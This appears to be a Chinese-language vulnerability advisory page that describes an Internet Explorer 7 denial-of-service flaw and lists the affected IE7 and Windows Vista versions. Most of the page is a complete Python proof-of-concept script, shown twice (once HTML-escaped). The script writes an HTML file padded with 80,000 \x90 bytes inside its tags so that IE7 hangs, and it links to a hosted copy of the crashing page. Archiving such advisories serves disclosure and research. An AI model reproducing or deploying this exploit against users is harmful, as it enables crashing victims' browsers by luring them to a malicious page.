VULHUB ™

Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer处理HTML存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 构建如下恶意的HTML代码，诱使用户使用IE处理，可导致应用程序崩溃： # usr/bin/python print "-------------------------------------------------------------------------" print " Internet Explorer 7.0.5730.11 Denial of Service" print " author: shinnai" print " mail: shinnai[at]autistici[dot]org" print " site: http://shinnai.altervista.org\n" print " For convenience I post up a script in python that create a .html file" print " You can open it locally, upload and browse it or directely browse here:\n" print " http://www.shinnai.altervista.org/ie_dos.html\n" print " About 60 seconds and IE7 stops to answer " print "-------------------------------------------------------------------------" tagHtml = "<html>" tagHtmlC = "</html>" tagHead = "<head>" tagHeadC =...

Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer处理HTML存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 构建如下恶意的HTML代码，诱使用户使用IE处理，可导致应用程序崩溃： # usr/bin/python print &quot;-------------------------------------------------------------------------&quot; print &quot; Internet Explorer 7.0.5730.11 Denial of Service&quot; print &quot; author: shinnai&quot; print &quot; mail: shinnai[at]autistici[dot]org&quot; print &quot; site: http://shinnai.altervista.org\n&quot; print &quot; For convenience I post up a script in python that create a .html file&quot; print &quot; You can open it locally, upload and browse it or directely browse here:\n&quot; print &quot; http://www.shinnai.altervista.org/ie_dos.html\n&quot; print &quot; About 60 seconds and IE7 stops to answer &quot; print &quot;-------------------------------------------------------------------------&quot; tagHtml = &quot;&lt;html&gt;&quot; tagHtmlC = &quot;&lt;/html&gt;&quot; tagHead = &quot;&lt;head&gt;&quot; tagHeadC = &quot;&lt;/head&gt;&quot; tagTitle = &quot;&lt;title&gt;&quot; tagTitleC = &quot;&lt;/title&gt;&quot; buff= &quot;\x90&quot; * 80000 boom = tagHtml + buff + tagHead + buff + tagTitle + buff + tagTitleC + tagHeadC + tagHtmlC try: fileOut = open('ie_dos.html','w') fileOut.write(boom) fileOut.close() print &quot;\nFILE CREATED!\n'NJOY IT...\n&quot; except: print &quot;\nUNABLE TO CREATE FILE!\n&quot; Microsoft Internet Explorer 7.0 beta3 Microsoft Internet Explorer 7.0 beta2 Microsoft Internet Explorer 7.0 beta1 Microsoft Internet Explorer 7.0 + Microsoft Windows Vista Ultimate + Microsoft Windows Vista Home Premium + Microsoft Windows Vista Home Basic + Microsoft Windows Vista Enterprise + Microsoft Windows Vista Business + Microsoft Windows Vista 0 + Microsoft Windows Vista 0 目前没有解决方案提供： <a href="http://www.microsoft.com/windows/ie/" target="_blank">http://www.microsoft.com/windows/ie/</a>